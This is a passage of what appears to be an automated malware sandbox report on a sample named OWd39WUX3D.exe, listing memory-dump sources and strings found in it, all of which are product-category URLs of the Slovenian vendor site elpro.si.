00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-telefoni
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/fiksni-infrardeci-ir-merilniki-tempe
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/kalibracijska-oprema-crno-telo-black
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/merilni-sistemi-za-temperaturo-calex
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/prikazovalniki-in-regulatorji-calex/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/prikazovalniki-za-fiksne-infrardece-
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/rocni-infrardeci-ir-merilniki-temper
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/izolirane-zice-termoparov/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/kabli-prikljucni-za-uporovna-tipala
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/kabli-termoclenov-za-termoelemente-
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/konektorji-za-prikljucitev-temperat
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/podaljski-za-termoclene-termoelemen
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/zice-temperaturno-obstojne-za-prikl
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 